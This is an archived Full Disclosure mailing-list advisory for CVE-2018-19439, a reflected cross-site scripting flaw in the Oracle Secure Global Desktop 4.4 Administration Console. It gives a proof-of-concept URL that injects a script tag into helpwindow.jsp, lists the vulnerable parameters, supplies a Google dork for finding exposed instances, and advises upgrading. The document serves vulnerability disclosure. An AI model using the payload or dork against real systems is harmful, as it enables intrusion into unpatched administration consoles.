[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] CVE-2018-19439 - Cross Site Scripting in Oracle Secure Global Desktop Administration Console - 
From:       Rafael Pedrero <rafael.pedrero () gmail ! com>
Date:       2018-11-23 6:28:29
Message-ID: CANoQWWd_GNJ_pPP1FXvqL2NoHyfvedTpFJwarVGrdEmQY-Cg7w () mail ! gmail ! com
[Download RAW message or body]

<!--
# Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop
Administration Console - 4.4; Build: 20080807152602
# Date: 22-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/
# Version: Oracle Secure Global Desktop Administration Console - 4.4;
Build: 20080807152602
# Tested on: all
# CVE : CVE-2018-19439
# Category: webapps

1. Description

Cross Site Scripting exists in the Administration Console in Oracle Secure
Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected
XSS via all parameters.


2. Proof of Concept

http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle­ministratorHelp
Window></TITLE></HEAD><body><script>alert("XSS")</script><!--&
> helpFile=concepts.html&pageTitle­ministrator
Help&mastheadUrl=/images/productNameSecondaryMasthead.png&mastheadDescription=Sun
Secure Global Desktop
Administration&jspPath=/sgdadmin/faces/com_sun_web_ui/help/&mastheadHeight@&mastheadWidth 

Vulnerables parameters:
windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription,
jspPath, mastheadHeight and mastheadWidth.

Google dorks:
inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"


3. Solution:

Update to the latests version Oracle Secure Global Desktop Administration
Console 5.4.

-->

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]